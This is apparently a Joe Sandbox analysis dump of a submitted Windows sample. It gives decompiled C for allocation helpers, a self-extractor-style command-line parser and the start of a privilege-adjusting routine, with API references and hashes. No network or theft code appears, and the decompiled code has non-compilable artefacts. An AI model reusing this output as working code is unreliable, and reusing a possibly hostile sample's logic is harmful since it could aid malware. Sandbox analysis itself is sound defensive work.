                                                                                                                                                                                                        • Opcode ID: 60530d2272302256f97b96e002d1123f82ff6d8e1677eea5fe204243fa690f3e
                                                                                                                                                                                                        • Instruction ID: 1978dd2deb2dad51b95fe74e67a3d8e2b0f3ebae75a43111e6572136e6ddcdc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60530d2272302256f97b96e002d1123f82ff6d8e1677eea5fe204243fa690f3e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0FE71914B08DE47619F39EC81BD2BBE5ABB5364330092BD46ED21D0DB70A551CBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002166AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00214777,?,00214E38,?), ref: 002166B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 9a2bcf2863186516d6b59fe66cc0bf7408e846d5e421ccd9740508ef00264121
                                                                                                                                                                                                        • Instruction ID: 876ffd7b58d3ac24d274fa4b56968945db051f298516ac080491dc93452c8182
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a2bcf2863186516d6b59fe66cc0bf7408e846d5e421ccd9740508ef00264121
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1B0927A232482426A204A757C2D69A2885A6E123A7E45B90F032C01E0CE3EC896D004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00214caa
                                                                                                                                                                                                        0x00214cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00214CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 551bd46fb85d2edd95597a25907424c7a62489eb8216c5ed74b661dd045d235c
                                                                                                                                                                                                        • Instruction ID: 7423b492707bd41d5df6a435b7ca81262eee6cd2917e48cb4ddfe8f296ef6f70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 551bd46fb85d2edd95597a25907424c7a62489eb8216c5ed74b661dd045d235c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAB09232044208B7CB001A82A809B853F19E788661F144010F60C450508A6294108696
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00214cc8
                                                                                                                                                                                                        0x00214ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: 79aa797134ace1dca36ead07da414fbbbe63b598fc074aa150c76f683ab745c3
                                                                                                                                                                                                        • Instruction ID: 433978e196ee71aaf323e9dbbd3668aa9bd62728b81d8eced848f9f1a6e92812
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79aa797134ace1dca36ead07da414fbbbe63b598fc074aa150c76f683ab745c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB0123100010CB78F001B42FC0C8853F1DD6C42607014020F50C41022CF3398118585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
E00215C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	signed int _v12;
	CHAR* _v265;
	char _v266;
	char _v267;
	char _v268;
	CHAR* _v272;
	char _v276;
	signed int _v296;
	char _v556;
	signed int _t61;
	int _t63;
	char _t67;
	CHAR* _t69;
	signed int _t71;
	void* _t75;
	char _t79;
	void* _t83;
	void* _t85;
	void* _t87;
	intOrPtr _t88;
	void* _t100;
	intOrPtr _t101;
	CHAR* _t104;
	intOrPtr _t105;
	void* _t111;
	void* _t115;
	CHAR* _t118;
	void* _t119;
	void* _t127;
	CHAR* _t129;
	void* _t132;
	void* _t142;
	signed int _t143;
	CHAR* _t144;
	void* _t145;
	void* _t146;
	void* _t147;
	void* _t149;
	char _t155;
	void* _t157;
	void* _t162;
	void* _t163;
	char _t167;
	char _t170;
	CHAR* _t173;
	void* _t177;
	intOrPtr* _t183;
	intOrPtr* _t192;
	CHAR* _t199;
	void* _t200;
	CHAR* _t201;
	void* _t205;
	void* _t206;
	int _t209;
	void* _t210;
	void* _t212;
	void* _t213;
	CHAR* _t218;
	intOrPtr* _t219;
	intOrPtr* _t220;
	signed int _t221;
	signed int _t223;

	_t173 = __ecx;
	_t61 =  *0x218004; // 0x58ac7c6d
	_v8 = _t61 ^ _t221;
	_push(__ebx);
	_push(__esi);
	_push(__edi);
	_t209 = 1;
	if(__ecx == 0 ||  *__ecx == 0) {
		_t63 = 1;
	} else {
		L2:
		while(_t209 != 0) {
			_t67 =  *_t173;
			if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
				_t173 = CharNextA(_t173);
				continue;
			}
			_v272 = _t173;
			if(_t67 == 0) {
				break;
			} else {
				_t69 = _v272;
				_t177 = 0;
				_t213 = 0;
				_t163 = 0;
				_t202 = 1;
				do {
					if(_t213 != 0) {
						if(_t163 != 0) {
							break;
						} else {
							goto L21;
						}
					} else {
						_t69 =  *_t69;
						if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
							break;
						} else {
							_t69 = _v272;
							L21:
							_t155 =  *_t69;
							if(_t155 != 0x22) {
								if(_t202 >= 0x104) {
									goto L106;
								} else {
									 *((char*)(_t221 + _t177 - 0x108)) = _t155;
									_t177 = _t177 + 1;
									_t202 = _t202 + 1;
									_t157 = 1;
									goto L30;
								}
							} else {
								if(_v272[1] == 0x22) {
									if(_t202 >= 0x104) {
										L106:
										_t63 = 0;
										L125:
										_pop(_t210);
										_pop(_t212);
										_pop(_t162);
										return E00216CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
									} else {
										 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
										_t177 = _t177 + 1;
										_t202 = _t202 + 1;
										_t157 = 2;
										goto L30;
									}
								} else {
									_t157 = 1;
									if(_t213 != 0) {
										_t163 = 1;
									} else {
										_t213 = 1;
									}
									goto L30;
								}
							}
						}
					}
					goto L131;
					L30:
					_v272 =  &(_v272[_t157]);
					_t69 = _v272;
				} while ( *_t69 != 0);
				if(_t177 >= 0x104) {
					E00216E2A(_t69, _t163, _t177, _t202, _t209, _t213);
					asm("int3");
					_push(_t221);
					_t222 = _t223;
					_t71 =  *0x218004; // 0x58ac7c6d
					_v296 = _t71 ^ _t223;
					if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
						0x4f0 = 2;
						_t75 = E0021597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
					} else {
						E002144B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
						 *0x219124 = E00216285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E00216CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E002144B9(0, 0x521, 0x211140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0x218588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E0021667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E0021667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E00215C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E00211680(0x218c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E0021667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E0021667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0x218a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E00215C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0x218b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0x218a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00211680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E0021658A(_t218, 0x104, 0x211140);
                                                                                                                                                                                                        																if(E002131E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x218a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x218a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x218a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x218a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x218a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x219a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x219a2c =  *0x219a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x218d48 =  *0x218d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x219a2c =  *0x219a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x219a2c =  *0x219a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x218d48 =  *0x218d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x219a2c =  *0x219a2c | 0x00000004;
																										L70:
																										 *0x218a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x219a2c = 3;
																	 *0x218a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0x218a2c != 0 &&  *0x218b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x219a3c, 0x218b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E002166C8(0x218b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x00216143
                                                                                                                                                                                                        0x00216144
                                                                                                                                                                                                        0x0021614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216150
                                                                                                                                                                                                        0x00216152
                                                                                                                                                                                                        0x0021615c
                                                                                                                                                                                                        0x00216170
                                                                                                                                                                                                        0x00216172
                                                                                                                                                                                                        0x0021617c
                                                                                                                                                                                                        0x00216190
                                                                                                                                                                                                        0x00216190
                                                                                                                                                                                                        0x00216196
                                                                                                                                                                                                        0x002161a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002161ab
                                                                                                                                                                                                        0x002161b9
                                                                                                                                                                                                        0x002161c6
                                                                                                                                                                                                        0x002161c6
                                                                                                                                                                                                        0x0021617e
                                                                                                                                                                                                        0x00216180
                                                                                                                                                                                                        0x0021618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021618a
                                                                                                                                                                                                        0x0021615e
                                                                                                                                                                                                        0x00216160
                                                                                                                                                                                                        0x0021616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021616a
                                                                                                                                                                                                        0x0021615c
                                                                                                                                                                                                        0x0021614a
                                                                                                                                                                                                        0x0021610b
                                                                                                                                                                                                        0x0021610e
                                                                                                                                                                                                        0x0021610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e59
                                                                                                                                                                                                        0x00215e59
                                                                                                                                                                                                        0x00215e5c
                                                                                                                                                                                                        0x0021604f
                                                                                                                                                                                                        0x00216056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021605c
                                                                                                                                                                                                        0x0021606e
                                                                                                                                                                                                        0x00216071
                                                                                                                                                                                                        0x00216073
                                                                                                                                                                                                        0x00216075
                                                                                                                                                                                                        0x00216075
                                                                                                                                                                                                        0x00216078
                                                                                                                                                                                                        0x00216078
                                                                                                                                                                                                        0x0021607a
                                                                                                                                                                                                        0x0021607b
                                                                                                                                                                                                        0x00216081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216087
                                                                                                                                                                                                        0x00216087
                                                                                                                                                                                                        0x0021608d
                                                                                                                                                                                                        0x0021609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002160a2
                                                                                                                                                                                                        0x002160aa
                                                                                                                                                                                                        0x002160b2
                                                                                                                                                                                                        0x002160b7
                                                                                                                                                                                                        0x002160bd
                                                                                                                                                                                                        0x002160bf
                                                                                                                                                                                                        0x002160bf
                                                                                                                                                                                                        0x002160d6
                                                                                                                                                                                                        0x002160e0
                                                                                                                                                                                                        0x002160e7
                                                                                                                                                                                                        0x002160f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002160f5
                                                                                                                                                                                                        0x0021609c
                                                                                                                                                                                                        0x00216081
                                                                                                                                                                                                        0x00215e62
                                                                                                                                                                                                        0x00215e62
                                                                                                                                                                                                        0x00215e65
                                                                                                                                                                                                        0x00215fd3
                                                                                                                                                                                                        0x00215fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fef
                                                                                                                                                                                                        0x00215fef
                                                                                                                                                                                                        0x00215ff7
                                                                                                                                                                                                        0x00215ffd
                                                                                                                                                                                                        0x00216003
                                                                                                                                                                                                        0x00216006
                                                                                                                                                                                                        0x00216011
                                                                                                                                                                                                        0x00216014
                                                                                                                                                                                                        0x0021603d
                                                                                                                                                                                                        0x00216016
                                                                                                                                                                                                        0x00216018
                                                                                                                                                                                                        0x00216019
                                                                                                                                                                                                        0x0021601b
                                                                                                                                                                                                        0x00216033
                                                                                                                                                                                                        0x0021601d
                                                                                                                                                                                                        0x00216020
                                                                                                                                                                                                        0x00216029
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216020
                                                                                                                                                                                                        0x0021601b
                                                                                                                                                                                                        0x00216042
                                                                                                                                                                                                        0x00216044
                                                                                                                                                                                                        0x00216046
                                                                                                                                                                                                        0x0021604a
                                                                                                                                                                                                        0x00215ff7
                                                                                                                                                                                                        0x00215fd5
                                                                                                                                                                                                        0x00215fd8
                                                                                                                                                                                                        0x00215fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e6b
                                                                                                                                                                                                        0x00215e6b
                                                                                                                                                                                                        0x00215e6e
                                                                                                                                                                                                        0x00215f8b
                                                                                                                                                                                                        0x00215f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215f9f
                                                                                                                                                                                                        0x00215fa7
                                                                                                                                                                                                        0x00215faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fb1
                                                                                                                                                                                                        0x00215fb3
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00215CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00218B3E,00000104,00000000,?,?), ref: 00215DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00215E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00215EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00215F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00215FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00216008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 002160AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00211140,00000000,00000040,00000000), ref: 002161F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 002161F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 1417746d9db4b157104e75cd264fb751214e265040f9ff124a2f7339dbc8d653
                                                                                                                                                                                                        • Instruction ID: d8a19202114e940e5a3796085943a015b69b015c2914bb09165f93852d82fda0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1417746d9db4b157104e75cd264fb751214e265040f9ff124a2f7339dbc8d653
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCD13B71D34A66DEDB358E389C4C7FA37E5ABB6300F1440EAC486C6590DAB44EE68F40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00211F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0x219a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
